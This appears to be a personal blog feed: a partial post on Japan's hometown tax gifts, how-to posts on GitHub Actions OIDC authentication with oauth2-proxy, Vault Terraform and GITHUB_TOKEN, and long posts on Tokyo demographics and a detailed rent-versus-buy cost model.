The program started in 2008, without the “thank you” gifts. The problem they wanted to solve was that many young people are moving from the countryside to cities, and their home towns are struggling financially (since a big part of their income comes from local’s residence tax). So the government’s solution was: let these young people send part of there tax back to their home town. But why didn’t the central government simply send money to these countrside towns instead of coming up with this complicated system? I don’t know the official reasons, but with this system part of the money is coming from the other (mostly urban) municipalities where the participants currently live, so the central government doesn’t have to fully foot the bill.

From 2008 to 2010 the program wasn’t too popular: in each of these year only around 33,000 people participated with an overall donation amount of 7 million yen per year. From 2011 the numbers start to increase (likely due to the ‘thank you gift’ system becoming widespread) reaching 1.3 million people in 2015, 2.2 million in 2016, almost 3 million in 2017 and 4 million in 2018 (source).

However since the ‘thank you gifts’ were not part of the original plan, there was no regulations about them. Initially cities would send their local specialities, but later as the program gathered steam, some places started to game the system and offer things like Amazon Gift cards in exchange for the donation. However this led to cities trying to out bid each other (why donate to a city for 10% cash back gift card if another city offers 12%) reaching to gift cards with more than 40% returned amount by 2018. So in 2019 the law was updated to limit the ‘thank you gifts’ to locally produced items with a maximum 30% value of the donated amount.

7. The websites

I use ふるさとチョイス, but some other options are ふるなび, ふるさとプレミアム, ふるさと本舗, and マイナビふるさと納税サイト. If you are in the Rakuten ecosystem, there is also 楽天ふるさと納税.

At the end of the day, most of these will be very similar, so don’t stress too much on which one to choose. You can always change it later too.

8. My usual picks

Here are some of the things that I got in the past and liked:

Recurring food deliveries - many places offer to send either the same, or different food every 1 or 2 months for 6-10 or 12 months. For example:
I usually look for these by searching for １２回. With these I usually forget what will come next month, so it has an additional suprise element. One thing to look out for: the amounts can be huge. Once we got 5 kg of corn (15 corns), so we ended up eating corn every day for 2 weeks. Same when we got 1.6 kg of aspargus.

Another potential downside with these is that you have to tell the place if you go for a longer holiday, otherwise they might send it during that. Since most places ship with Yamato, another option we have done is to call Yamato when you get the notification of something coming, and ask them to deliver it to a different address(e.g. friend or family). Yamato offers this for free, but only if you call them.
one-off food, when we need it:
The listings usually indicate when they ship it, which is really important to check as some stuff is only shipped after the harvest, which can be months away.
one-off items where quality is important
- bath towels
- feather comforter
- wooden box to store rice - supposedly also protects the rice from insects and mold

Authenticating Github workflows with oauth2-proxy

2023-07-04T00:00:00+00:00

oauth2-proxy is often used to handle user authentication for apps, however non-human users (e.g. CI workflows) are often unable to complete the OIDC flow. In this post I will show how to configure oauth2-proxy to trust Github’s OIDC provider and use that JWT to authenticate workflows and give them access to the app behind the proxy.

1. Figure out the JWT issuer URL

We are using the Github OIDC feature that allows workflows to obtain a Github-signed JWT. The Github docs say that this is https://token.actions.githubusercontent.com for github.com, and https://HOSTNAME/_services/token for Github Enterprise.

To limit the scope of the token to this specific use-case, we also need to pick an audience. This should be a unique, non-secret value. I will pick szabo-jp-example-app.

2. Configure the oauth2-proxy

Oauth2-proxy supports skipping the OIDC flow if a JWT is passed in a header. To configure this we need to add the following two config options:

--skip-jwt-bearer-tokens=true
--extra-jwt-issuers="https://token.actions.githubusercontent.com=szabo-jp-example-app"

The --extra-jwt-issuers config flag holds a list of issuer=audience pairs. When using a different issuer, make sure it has $ISSUER/.well-known/openid-configuration or $ISSUER/.well-known/jwks.json, e.g. github.com has the former.

3. Configure the Github action workflow to obtain and use the JWT

name: Test Github JWT with oauth2-proxy
on:
  push
# permission can be added at job level or workflow level    
permissions:
  id-token: write # This is required for requesting the JWT
  contents: read  # This is required for actions/checkout, that this example actually doesn't use, but real code probably will
jobs:
  test:
    runs-on: ubuntu-latest
    steps:
    - name: Test
      run: |
        GH_JWT=$(curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL&audience=szabo-jp-example-app" | jq -j -c '.value')
        curl -v -H "Authorization: Bearer $GH_JWT" https://your-app-behind-oauth2-proxy.example.com/

The workflow needs the id-token: write permissions, and once this is set, you can call the endpoint that returns the JWT.

Make sure to pass the same audience to the call that you configured with the oauth2-proxy!

The response is a json, so we use jq to get only the value. Note the use of -j which avoids quoting the token value (a pretty hard to debug issue, as Github filters the token value in workflow logs). If this fails, make sure jq is installed on the runner.

Once the JWT is obtained, we can pass it to the oauth2-proxy via the Authorization: Bearer header.

4. Debugging

If it’s not working, check the oauth2-proxy logs. You might find a message like

[2023/07/04 07:07:27] [jwt_session.go:51] Error retrieving session from token in Authorization header: no valid bearer token found in authorization header
[2023/07/04 07:07:27] [oauthproxy.go:866] No valid authentication in request. Initiating login.

I found that it’s the easiest to check the project’s source to see why a certain error is returned.

If everything is working you should see a log message like this:

127.0.0.6 - 3e98af6c-2d10-4b53-fa52-7a7a89f6b824 - repo:markszabo/markszabo.github.io:ref:refs/heads/testing-github-jwt [2023/07/04 07:07:56] your-app-behind-oauth2-proxy.example.com GET / "/debug" HTTP/1.1 "curl/7.81.0" 200 3306 0.055

5. Identity of the workflow

When the --pass-user-headers config option is set, oauth2-proxy passes the authenticated user’s identity in the headers X-Forwarded-User, X-Forwarded-Groups, X-Forwarded-Email and X-Forwarded-Preferred-Username. But now that we are skipping the OIDC flow, what value do these headers get?

The log output earlier already hinted at it:

X-Forwarded-Email: repo:markszabo/markszabo.github.io:ref:refs/heads/testing-github-jwt
X-Forwarded-User: repo:markszabo/markszabo.github.io:ref:refs/heads/testing-github-jwt

The value is the sub subject claim from the JWT, which in case of the Github JWT has the following format: repo:ORG/REPO:ref:GITHUB_REF. GITHUB_REF usually holds the branch name, but not always.

When configuring authorization in your app based on these headers, make sure to include the trailing colon. For example strings.HasPrefix(authHeaderVakue, "repo:markszabo/markszabo.github.io") will also match other repositories, e.g. markszabo/markszabo.github.io-other-repo, so use strings.HasPrefix(authHeaderVakue, "repo:markszabo/markszabo.github.io:") to avoid this.

How to use the vault terraform provider locally and in a Github action ci workflow at the same time

2023-06-18T00:00:00+00:00

In one of my the projects I manage vault resources via terraform. The main terraform pipeline runs in a Github action workflow and uses Github’s JWT to connect to vault. Meanwhile user authentication is done using vault’s OIDC auth method.

This post will show how to setup the vault terraform provider so that it uses the Github signed JWT when running in CI, and OIDC authentication when running locally.

First lets see the provider setup for the two use case separately.

The CI setup

To authenticate to vault using the Github provided JWT, we can use the auth_login_jwt configuration block:

provider "vault" {
  address = local.vault_dev_url
  auth_login_jwt {
    namespace = "ns_my_project_dev"
    mount     = "jwt"
    role      = "full-access"
    jwt       = var.github_jwt
  }
}

This assumes we have the jwt backend configured to trust Github and the JWT is authorized to assume the role named full-access.

The jwt is obtained in the Github workflow and passed to terraform like this:

    - name: Get Github JWT for terraform
      run: |
        GH_JWT=$(curl -H "Authorization: bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL" | jq -j -c '.value')
        echo TF_VAR_github_jwt=$GH_JWT >> $GITHUB_ENV

The ACTIONS_ID_TOKEN_REQUEST_TOKEN and ACTIONS_ID_TOKEN_REQUEST_URL are automatically configured if the workflow has the id-token: write permission.

The local setup

Terraform provides an auth_login_oidc config block, however it didn’t fit my use case. We use vault enterprise with namespaces. The oidc auth provider used for user authentication is configured in the root namespace, but most user only have access to their assigned namespaces (e.g. ns_my_project_dev).

So I will first run the vault cli to login and obtain a short lived token, then pass that token to terraform:

export TF_VAR_vault_dev_token=$(VAULT_ADDR=https://vault-dev.example.com vault login -token-only -method=oidc -path=oidc)

The token is then used to configure the terraform provider:

provider "vault" {
  address = local.vault_dev_url
  
  token            = var.vault_dev_token
  namespace        = "ns_my_project_dev"
  skip_child_token = true
}

skip_child_token was necessary as I’m not allowed to create child tokens in the root namespace, and the default behavior of terraform is to do just that.

There is an additional benefit of running vault cli to obtain the token, and then using that to configure the provider instead of using the auth_login_oidc config block in the provider directly: the token grants access to multiple namespaces, and with this setup we can use it for all of them without having to complete the OIDC flow multiple times.

Putting it all together

Now that we have the provider config for both use-cases, let’s put it together:

provider "vault" {
  address = local.vault_dev_url
  dynamic "auth_login_jwt" { # Github OIDC token is used for auth in the CI
    for_each = var.vault_dev_token == null ? [true] : []

    content {
      namespace = "ns_my_project_dev"
      mount     = "jwt"
      role      = "full-access"
      jwt       = var.github_jwt
    }
  }
  token            = var.vault_dev_token # Token is used for auth when running locally
  namespace        = var.vault_dev_token == null ? null : "ns_my_project_dev"
  skip_child_token = true
}

with the following variables:

variable "vault_dev_token" {
  type        = string
  description = "Used when running tf locally"
  default     = null
}

variable "github_jwt" {
  type        = string
  description = "Used to authenticate to vault when running tf in CI"
  default     = ""
}

Depending on whether the vault_dev_token variable is set or not, this setup will result in one of the config shown earlier.

Similar tricks with dynamic config blocks, and the use of the null value should make other setups possible with different auth methods, and likely even with other providers.

Accessing the Github token from a Github action

2023-06-18T00:00:00+00:00

For each Github action workflow, Github creates a unique Github token. This can accessed a either via the GITHUB_TOKEN secret (${{ secrets.GITHUB_TOKEN }}) or via the github context (${{ github.token }}). The docs also note that

An action can access the GITHUB_TOKEN through the github.token context even if the workflow does not explicitly pass the GITHUB_TOKEN to the action.

However the docs fall short of showing how to do it, and it took me a while to figure it out, so I’m sharing it here.

The solution is to use an input and set its default value to github.token. In composite actions, one can also use the github context directly, however it can not be used when passing environment variables in a non-composite action.

name: 'Test github context access'
inputs:
  gh-token:
    description: "A GitHub PAT used to add the comment to the PR"
    default: ${{ github.token }}
runs:
  using: "composite"
  steps:
    - name: Get all issues for this repository
      shell: bash
      run: |
        curl -L \
        -H "Accept: application/vnd.github+json" \
        -H "Authorization: Bearer ${{ inputs.gh-token }}" \
        -H "X-GitHub-Api-Version: 2022-11-28" \
        https://api.github.com/repos/${{ github.repository }}/issues

See this in action here.

This also works for other values in the github context like github.repository, github.sha, github.event_name, etc.

Thoughts on the future of the real estate market of Tokyo

2023-01-15T00:00:00+00:00

This is a continuation of my previous post on buying vs renting in Tokyo

The future resale price of a property depends on demand: are there going to be people willing and able to purchase it? Let’s look into the forecasts affecting this. I will try my best to use official (government) statistics and forecasts, even if these are a few years outdated.

Japan

The population of Japan is declining since 2008, with the population aging rapidly (40% of total private households are elderly households (private households with household members aged 65 years old and over)). Moreover the number of households is predicted to peak in 2023 and then decline. (The delay compared to population peak is due to households getting smaller in recent years.)

Wage growth has been minimal during recent years. From 2012 to 2018 the year over year average income per household changed: -1.55%, +2.46%, +0.65%, +2.71%, -1.54%, +0.13%.

Tokyo

The population of Tokyo is still growing and expected to peak around 2030. The ratio of elderly people (65 year+) is currently 23%, and it is expected to grow to more than 30% by 2045. A different, 2019 study titled “Household Projections for Japan by Prefecture : 2015-2040” predicts that the number of households within Tokyo will follow a similar trend.

Predictions from the two studies above:

	2015	2020	2025	2030	2035	2040	2045
Total population of Tokyo	13,515,000	13,733,000	13,846,000	13,883,000	13,852,000	13,759,000	13,607,000
Change from 5 year prior		+1.61%	+0.82%	+0.27%	-0.22%	-0.67%	-1.10%
Population over 65	3,066,000	3,215,000	3,272,000	3,422,000	3,675,000	3,996,000	4,176,000
Share of elderly population	22.69%	23.41%	23.63%	24.65%	26.53%	29.04%	30.69%
Number of households	6,691,000	6,922,000	7,054,000	7,107,000	7,097,000	7,019,000
Change from 5 year prior		+3.5%	+1.9%	+0.8%	-0.1%	-1.1%

So the population as well as the number of households in Tokyo is expected to peak in 10 years and then decline, while the population continues to age. This will very likely put strain on the pension system: lower pension being paid, while the working generation will get taxed higher. Overall this will likely result in lower buying power for real estate.

Moreover I’m looking for a family-size home (3-5 rooms), and the need for those will likely decrease faster as the number of young people with families fall.

Side note on prefectures around Tokyo: the above statistics are concerned only about the prefecture of Tokyo, while many people who work in Tokyo commute from neighboring prefectures like Chiba, Saitama and Kanagawa. However the number of commuters outside of Tokyo only accounted for 18% of the population of Tokyo in 2010, so using Tokyo numbers is likely a good enough approximation for the Greater Tokyo Area.

Market in recent years

The property market in Tokyo has been pretty hot in recent years reaching levels last seen during the bubble in the ’90s:

An IMF study on the Japanese real estate market

In 2020 the International Monetary Fund published a study titled Demographics and the Housing Market: Japan’s Disappearing Cities on the present and future of the Japanese real estate market. Below are some of their findings that I found interesting.

When population falls, house prices fall faster

We find that there exists a positive correlation between population growth and house prices—a 1 percent increase in population growth is associated with a 5 percentage points increase in house prices. Furthermore, we find that this positive correlation embeds a nonlinear relationship between population growth and house price changes. Consistent with the durable housing model (Glaeser and Gyourko (2005)), the magnitude of house price decreases associated with population decline is larger than the magnitude of house price increases associated with population increase of the same magnitude in absolute terms. This non-linear relationship is time-varying. Using the same data looking at just the last ten years, the positive correlation between an increase in population and an increase in house prices has weakened, although the positive correlation between negative population growth and the decline in house prices remains.

Emphasis mine.

This can be largely explained by the fact that when the demand is going up, then developers can build new buildings, so the supply can increase too. However when demand is falling, supply will not fall so quickly. This is likely more true for countries with older houses, as in Tokyo very few people would want to live in a 20+ year old house that hasn’t been renovated recently, but based on this study it is also true for Japan in general.

Self-fulfilling prophesies

The linkage between population loss and a housing price decline could lead to a vicious cycle—residents expecting a housing price decline may sell their houses and have less incentives to own houses, which will add to already-existing oversupply for houses and create further downward pressures on housing prices.

This is the same thinking as looking at a hot market and expecting it to keep going up. Considering the significant portion of foreign investment into the Tokyo real estate, these investors might move fast on signs of prices dropping speeding up the process.

Moving to the city abroad

House price declines directly affect local governments by reductions in tax revenue from housing transactions. It would produce the second-round effect, quality and quantity of social spending in the area. This might accelerate population outflows, which further exacerbates the housing market and prices.

The article discusses this issue in relation to young people moving to large cities, however if the same situation would to come for Tokyo in 20-30 years, then highly skilled people will consider moving abroad, the same way many of their parents and grandparents moved from their villages to the cities. The same way this accelerated the real estate decline on the countryside, this can result in a similar effect for Tokyo.

Thoughts on renting vs buying in Tokyo

2023-01-14T00:00:00+00:00

Recently I’ve been thinking a lot about buying either a house or an apartment (mansion), or whether renting makes more sense for now. The primary aim of this post is to collect my thoughts, and record the decision so that I can revisit it in the future. It might also help others considering the same question, but that’s not the main intention (e.g. I will focus exclusively on my use-case and not cover other locations or sizes).

Situation

Real estate comes in all shapes and sizes, and Tokyo is huge, so it is important to note the constraints of my situation. My family has the current need of a 3LDK (one bedroom, two workrooms), and the long-term need of at least a 4LDK, maybe 5LDK (1-2 kids planned).

Location-wise currently we live near Mitaka station, and really like it, so we are looking for places around here. Mitaka station is a limited express stop on the Chuo line, and the stating point of the Chuo Sobu/Tozei line. The Chuo express takes 18 minutes to Shinjuku and 32 minutes to Tokyo station.

Available options

I have been looking at Suumo and Homes for places, and these seem to be the possible options in the size we need (3-5LDK) up to 20 minutes from Mitaka station.

Renting

It seems that we can find suitable mansions (3LDK, less than 10 years old, less than 15 minutes to station) for around 250,000-270,000 yen/month including management fee.

Buying a normal apartment

A 5 year old or younger mansion 15-20 minutes walk from the station. 60-70 sqm, 3-4LDK, 70-80m yen. Management fee: 10,000 yen/month, repair fund: 20,000 yen/month (might be lower initially, but tend to go up with time).

Buying a normal house

A brand new house 20-25 minute from the station in a residential area. 80-90 sqm house with 2 floors on a 100-110 sqm land. 70-90m yen.

Buying a fancy apartment

Brand new mansion less than 5 minutes from the station. 3LDK, 70 sqm, 120m yen. Management fee: 30,000 yen/month, repair fund: 20,000 yen/month (might be lower initially, but tend to go up with time).

Buying a fancy house

A brand new house 10-15 minutes from the station. 90-95 sqm house with 2 floors on a 110-120 sqm land. 130-140m yen.

Buying land and building our own house

A suitable land (100-130 sqm) goes for 70-80m yen 10-20 minutes from the station. This usually allows a 40-50% building coverage ratio with a floor-area ratio of 80-100% allowing for a 2 story house with up to a 100 sqm overall floor space.

Building a decent house seems to be between 20-50m yen (although this is where I have the least reliable data, basing this on other people’s posts online).

Overall this means that building the house ourselves would come down to about the same price as buying a new house that’s already built. Thus this options is close to identical of buying a house, so I will not consider this separately.

Costs of renting vs buying

Renting

This is relatively simple:

Monthly rent
Monthly management fee
Renewal fee, usually 1 month extra rent every 2 years

When moving, there are additional costs, usually coming down to 1 month rent key money (non-refundable), 1-2 month rent deposit (mostly refundable), 1 month rent as real estate agency fee, additional random fees (cleaning, key replacement, etc.). If one schedules the moving before the renewal, then the extra fees end up being around 2 months’ rent.

However most rental contracts can be renewed indefinitely, and I don’t feel it is fair to assume moving regularly, when the alternative is buying, which makes moving very costly. Thus I will only use the renewal fee in the calculation, and assume that one rents the same place for the entire duration of the simulation.

Buying a property

Online sources suggest that the extra costs of buying a property (tax, real estate agency fees, bank fees) add up to 6-7% of the property’s price.

Selling a property

Online sources suggest 4% of the sale price.

There is an additional capital gain tax on the gains, which is 41.1% if selling within 5 years and 20% if selling after. In further calculations I assume that the property value doesn’t go up, so I won’t be considering this.

Moreover the same 20% capital gain tax is levied on normal investments, thus when comparing with the alternative investment it would be the same.

Owning an apartment

Costs of owning an apartment:

Monthly mortgage
Management fee - usually 10,000 yen/month (but have seen 30,000 yen too for an expensive place, and 20,000 yens for older places)
Repair fund - this is to pay for maintenance of the building and shared spaces. Tend to start low (5,000-10,000 yen) and go up to 20,000 yen after 20 year
Renovating the inside of the apartment - I’m putting this at 40,000 yen/month, which equals to 4.8m yen for 10 year that should be enough to completely renovate the place (new ACs, new wallpaper, new kitchen, new bathroom) - though I can be completely off with this one
Property tax - Mitaka City has a property tax rate of 1.4% and a city planning tax rate of 0.225%, so 1.6% of the book value of the property. There are some deductions, and this is based on the property value determined by the city. Based on discussions with a real estate agent this comes down to 150-250,000 yen/year for the first 10 years then higher (first 10 year for new mansions is half price). Afterwards as the value is depreciating, it will keep falling. I will simply use 200,000 yen/year for the entire duration for the normal mansion and 300,000 yen/year for the fancy one.

Owning a house

Costs of owning an house:

Monthly mortgage
Renovating the house - I’d put this at 60,000 yen/month, which equals to 7.2m yen for 10 year that should be enough to completely renovate the place. This is 720,000 yen/year, so assuming a building price of 40m yen, this is would mean 1.8% of the value of the building. Considering the 1% rule, this might be an overestimate, but taking into account the lower building lifespan of Japanese houses compared to western ones, I think it is a reasonable estimate.
Property tax - same as with the apartment, but this is split into the land (keeps the value) and the house (depreciates quickly). Based on discussions with a real estate agent this is 16-170,000 yen/year initially then it goes up to 200,000 yen/year after 3-5 years (again initially it’s half price then doubles, but as the building has depreciated, it is less than double). I’ll use 200,000 yen/year for my calculations for the normal house, and 300,000 yen/year for the fancy one.

Mortgage interest

Based on reddit the most common mortgage for your own home is a 35-year variable rate mortgage, which might come at an interest rate around 0.475%. Meanwhile fixed rate mortgages seem to go around 1% (although they have been going up recently due to interest rate changes from the Bank of Japan).

These rates are super low. Borrowing 100m yen on 0.475% for 35 years will make you pay back 108m, while on 1% it will come down to 118m. (As a comparison, at 5% this would be 211m.) These low rates make longer loans affordable and relatively cheap - thus the very long 35 year term (compared to other countries).

This also makes down-payments financially a bad idea: even if one could pay 10m of the 100m loan as down payment, it would make more sense to take the entire amount as a loan (assuming they could get the same interest rate). With a 1% interest rate on the loan, the 10m extra will cost them 11.8m in 35 years with a monthly mortgage of 28,229 yen. Meanwhile investing the 10m on the stock market (which historically brought 10% nominal, 7% real return) and paying the monthly 28,229 yen from this investment would make it grow into 53m in 35 years. Even if we go with a more moderate 5% real rate of return, we would get 22m for essentially free after 35 years.

Again based on reddit one can get a mortgage for more than the value of the home to cover the other initial costs (taxes, real estate agency fees, etc.). If one can get it at the same super-low rate, then doing this is also beneficial over paying it by cash.

35 years

35 years is scary long. It’s longer than how long I have lived sofar.

If I would take a 35 year loan this year, then I would pay it off in 2058. I would be 65 by then, so might be getting ready to retire. If we had a kid 2 years from now, that kid would be 33 year old by then, older than how old I am now. Meaning I could become a grandparent before I pay off this loan.

Scary.

Calculations

Constraints

Zero down-payment. Mortgage for the full price and initial costs - the reasoning for this is explained above
Fixed interest rate at 1%
Inflation is assumed to be 1% - this is required to increase rent, management fee, repair costs, while mortgage stays the same
For the scenarios where I sell, I assume no change in the market (as I can’t predict the future), meaning:
- The price of land increases with inflation (1% yearly)
- The house depreciates linearly for 25 years, then it’s worth 0, while the land maintains its value
- The mansion depreciates linearly for 50 years, then it’s worth 0. To simplify the calculation, the land that belongs to the mansion unit is not taken into account for future value.

Outcome

For every year I calculate the following:

Remaining principal of the loan (if I sell that year, this is how much I need to pay the bank to close the mortgage)
Remaining value of the property (based on the assumption above)
Money received if selling (this is the remaining value minus the 4% fee of selling)
Balance if selling and paying off the remaining principal with the money received from selling
The opportunity cost compared to renting: if I pay less when renting, then I can invest this extra money and get a 5-7% real return. Meaning after selling the property I don’t only need to break even, I need to beat this as well to make it more beneficial than renting. I’ll be using 5% real return for this calculation, so 6% nominal return with the 1% inflation.

Renting

Monthly rent of 250,000 yen, 10,000 yen management fee and 1 month renewal fee every other year, resulting in a 270,417 yen cost per month, increased with inflation every year.

Buying a simple mansion

Price: 75,000,000 yen, which is 80,250,000 yen after the 7% initial costs resulting in a monthly mortgage of 226,534 yen. This is paid off after 35 years.

Additional costs are: management fee of 10,000 yen, building repair fund of 20,000 yen, inside repair saving of 40,000 yen and property tax of 16,667 yen, bringing the monthly non-mortgage fees to 86,667 yen. This is increased with inflation each year.

The overall initial monthly cost is 313,201 yen, which is 42,784 yen more than renting.

It takes 14 years for the resale value (minus fees) to overtake the remaining principal, meaning if I would to sell before that, then I would have to pay extra to the bank just to close the mortgage. However by this time time in the renting scenario I have invested the extra 42,784 yen (+ inflation) each month, and it has grown to 7,623,400 yen.

After 35 years the mortgage is paid off, and I can sell the mansion for 20,160,000 yen (after paying the selling fees). However by this time the invested 42,784 yen/month (+inflation) would have grown into 21,942,217 yen, making renting a slightly better decision even on the 35 year time-frame.

After 35 years the mortgage is fully paid off, so I can live for free (barring management fees and maintenance), so after an other 5 years the overall value of buying overtakes rent. (Even though at 35 year the difference is only 5% it takes 5 year to close that gap due to the value of the mansion continuing to decrease while the investment keeps growing 6% yearly.)

Conclusion: with the above assumptions you have to live in the mansion for at least 40 years to make it financially beneficial compared to renting

Tuning the parameters

What if rent is 10,000 yen more, so 260,000 yen instead of 250,000 yen?

Then buying a mansion makes sense after only 22 years, so almost half the time. This is mostly due to rent growing faster with inflation, and it will overtake the mortgage and fees after 16 years, from which point on the monthly cost of renting will be higher than the mortgage and fees offsetting the earlier savings in only 6 years.

What if the mansion still has half of its nominal value after 50 years instead of going down to zero?

Buying a mansion becomes financially beneficial after 10 years, and at 35 years the mansion’s resale value (minus fees) is at 46,080,000 yen, while the alternative investment only grew to 21,942,217 yen.

What if interest rate is only 0.3%? (This seems to be around the lowest variable rate currently. I’ll assume it stays the same for the entire time.)

The monthly mortgage is down to 201,302 yen from 226,534, making it more beneficial to buy after 13 years.

What if inflation is only 0.5%?

Then it takes 60 years for buying to make more sense than renting.

What if the price of mansion increases by 1% yearly (equal to the rate of inflation)? (Depreciation is still taken into account.)

Then it takes only 14 years for buying to overtake renting.

What if the price of mansion increases by 2% yearly (1% over inflation)?

Then it takes only 7 years for buying to be better.

What if the price of mansion decreases by 1% yearly?

Then it takes 43 years for buying to overtake renting. At this point the value of the mansion is close to zero, so this is mostly due to living rent free for the previous 8 years, while rent keeps going up with inflation.

Buying a simple house

Price: 90,000,000 yen, which splits into 70,200,000 yen for the land, and 19,800,000 yen for the building. This becomes 96,300,000 yen after the 7% initial costs resulting in a monthly mortgage of 271,841 yen. This is paid off after 35 years.

Additional costs are: repair saving of 60,000 yen and property tax of 16,667 yen, bringing the monthly non-mortgage fees to 76,667 yen. This is increased with inflation each year.

The overall initial monthly cost is 348,508 yen, which is 78,091 yen more than renting.

It takes only 5 years for the resale value (minus fees) to overtake the remaining principal, meaning if I would to sell before that, then I would have to pay extra to the bank just to close the mortgage. However by this time time in the renting scenario I have invested the extra 78,091 yen each month, and it has grown to 4,899,647 yen. This 5 year is much shorter than the mansion’s 14 year, mostly as the land is assumed to appreciate with inflation, while the mortgage stays fixed, making the overall depreciation less than the mansion’s.

After 8 years buying is more beneficial than renting, again mostly due to the land’s value increasing with inflation.

After 35 years the mortgage is paid off, and the land still has a resale value of 96,422,370 yen (yearly 1% increase, minus 4% selling fee), while in case of renting and investing the monthly 78,091 yen difference (plus inflation), that investment would have only grown to 69,881,681 yen. So about 28% less. Comparable, but less.

Interestingly even after 50 years (so 15 years after the mortgage is paid off), the difference remains very similar: the resale value of the land is 111,943,378 yen, while the alternative investment has grown to 84,448,793 yen (25% less). Again even though the mortgage is paid off, the alternative investment grows faster than the value of the ~~house~~ land slowly closing the gap.

Conclusion: with the above assumptions you have to live in the house for at least 8 years to make it financially beneficial compared to renting, however even after living in the house for 50 years, you are only 33% better off than renting

Tuning the parameters

What if rent is 10,000 yen more, so 260,000 yen instead of 250,000 yen?

After 7 years buying is more beneficial, and after 35 years the resale value of the land is 96,422,370 yen while the alternative investment only grew to 52,922,561 yen (46% less).

What if interest rate is only 0.3%?

Mortgage is down to 241,562 yen from 271,841 yen making buying beneficial from the 5th year. After 35 years this makes the alternative investment worth 26,963,178 yen while the house’s resale value is 96,422,370 yen.

What if inflation is only 0.5%?

Then it takes 12 years for buying to make more sense than renting (up from 8 years at 1% inflation).

What if the price of the land increases by 2% yearly (1% over inflation)?

Then it takes only 5 years for buying to be better, and by 35 years the resale value of the land is at 137,472,088 yen, while the alternative investment only grew to 69,881,681 yen (49% less).

What if the nominal price of land stays the same (so it doesn’t increase with inflation)?

After 7 years the resale value passes the remaining principal (minus selling fees), but it never overtakes the alternative investment. At 35 year the resale value is 67,392,000 yen (the purchase price of 70,200,000 yen minus fees), while the alternative investment has grown to 69,881,681 yen. Very close.

What if the nominal price of the land decreases by 1% yearly (-2% over inflation)?

After 10 years the resale value passes the remaining principal (minus selling fees). At 35 years the resale value is 46,932,680 yen, while the alternative investment has grown to 69,881,681 yen. By this time the land lost 30% of it’s nominal value (down to 47m from 70m), while in real terms (accounted for the 1% inflation) it has lost half of its value (70m increased by 1% for 35 years is 100m).

A pessimistic outlook: inflation is at 0.5%, and the nominal price of the land decreases by 1% yearly?

After 10 years the resale value passes the remaining principal (minus selling fees). At 35 years the resale value is 46,932,680 yen, while the alternative investment has grown to 79,790,081 yen.

A super pessimistic outlook: inflation is at 0.5%, and the nominal price of the land decreases by 2% yearly?

If selling after 5 years, we would still owe the bank 8m. If selling after 10 years, we would still need to pay the bank an extra 5m out of pocket. After 18 years the resale value passes the remaining principal minus selling fees. At 35 years the resale value is 32,564,699 yen, while the alternative investment has grown to 79,790,081 yen. By this time the land lost half of it’s nominal value (down to 34m from 70m), while in real terms it has lost 60% of its value (70m increased by 0.5% for 35 years is 83m).

Buying a fancy mansion

Price: 120,000,000 yen, which is 128,400,000 yen after the 7% initial costs resulting in a monthly mortgage of 362,455 yen. This is paid off after 35 years.

Additional costs are: management fee of 30,000 yen, building repair fund of 20,000 yen, inside repair saving of 40,000 yen and property tax of 25,000 yen, bringing the monthly non-mortgage fees to 115,000 yen. This is increased with inflation each year.

The overall initial monthly cost is 477,455 yen, which is 164,254 yen more than renting.

As this mansion is close to the station, I assume that even after 50 years it will still keep half of it’s nominal price. Until then, depreciation is linear.

It takes 7 years for the resale value (minus fees) to overtake the remaining principal, meaning if I would to sell before that, then I would have to pay extra to the bank just to close the mortgage. However by this time time in the renting scenario I have invested the extra 164,254 yen (+ inflation) each month, and it has grown to 20,252,937 yen.

After 35 years the mortgage is paid off, and I can sell the mansion for 73,728,000 yen (after paying the selling fees). However by this time the alternative investment would have grown into 260,731,682 yen, making renting a much worse financial decision. (On the other hand I spent that 35 years in a fancy mansion right at the station saving me ~2*10 minutes each day, amounting to almost half year of time saved.)

After 35 years the mortgage is fully paid off, so I can live for free (barring management fees and maintenance), but the mansion’s value never takes over the alternative investment.

Conclusion: a fancy mansion is not a good investment on purely financial grounds due to the high monthly costs and loosing out on what that money could have earned if invested on the stock market (assuming the depreciation model is correct).

Buying a fancy house

Price: 135,000,000 yen, which splits into 108,000,000 yen for the land, and 27,000,000 yen for the building. This becomes 144,450,000 yen after the 7% initial costs resulting in a monthly mortgage of 407,762 yen. This is paid off after 35 years.

Additional costs are: repair saving of 60,000 yen and property tax of 25,000 yen, bringing the monthly non-mortgage fees to 85,000 yen. This is increased with inflation each year.

The overall initial monthly cost is 492,762 yen, which is 144,254 yen more than renting.

It takes only 5 years for the resale value (minus fees) to overtake the remaining principal. However by this time time in the renting scenario I have invested the extra cash each month, and it has grown to 14,674,185 yen.

After 35 years the mortgage is paid off, and the land still has a resale value of 148,342,107 yen (yearly 1% increase, minus 4% selling fee), while in case of renting and investing the monthly difference, that investment would have grown to 276,109,635 yen.

Again the value of living in a fancy house is not so much the financial benefit, rather the better quality of life. (Though research has shown that experiences bring more happiness than material things, as we tend to get used to better stuff quickly, so the fancy house might not bring us so much happiness than getting a cheaper home and going skiing/surfing every other weekend.)

Conclusion: a fancy house is also not a good financial investment if the appreciation assumptions are correct

Tuning the parameters

I did not consider the fancy options seriously, so I did not play with the parameters so much. So only checking one scenario: the fancy house has a great location, so the land might appreciate faster than inflation.

What if the real price of the land increases by 2% yearly (1% over inflation)?

Buying becomes financially better only after 10 years, however after 20 years renting comes ahead again (the invested amount grows to the point where the 6% rate of return overtakes the 1%).

What if the price of the land increases by 3% yearly (2% over inflation)?

Buying becomes financially better only after 5 years, however after 40 years renting still overtakes buying.

Conclusion

a small change to rent (e.g. 10,000 yen) makes a big change in the calculation. This also means that if one invests just slightly less than planned, then renting might come out worse. (This is actually a common argument for buying: you will not miss a mortgage payment, but you might lower your monthly investment to buy that fancy car or go on that exotic vacation. However this only really makes sense if a significant portion of your investment is coming from the savings of renting, as otherwise lifestyle creep will eat into your investing even if you buy.)
a significant benefit of buying comes from inflation: rent increases, but mortgage stays the same
buying expensive real estate only makes sense if their value goes up significantly, or for the luxury. Otherwise their monthly increased costs would be better spent invested elsewhere.

Small changes to the model (e.g. 10.000 yen difference in rent, 1% vs 0.5% inflation, +/-1% change in the value of land) makes either renting or buying more beneficial, so at the end of the day, I don’t have a clear winner.

Vitus Zenium Road Bike (Tiagra) 2020 Specifications

2023-01-02T00:00:00+00:00

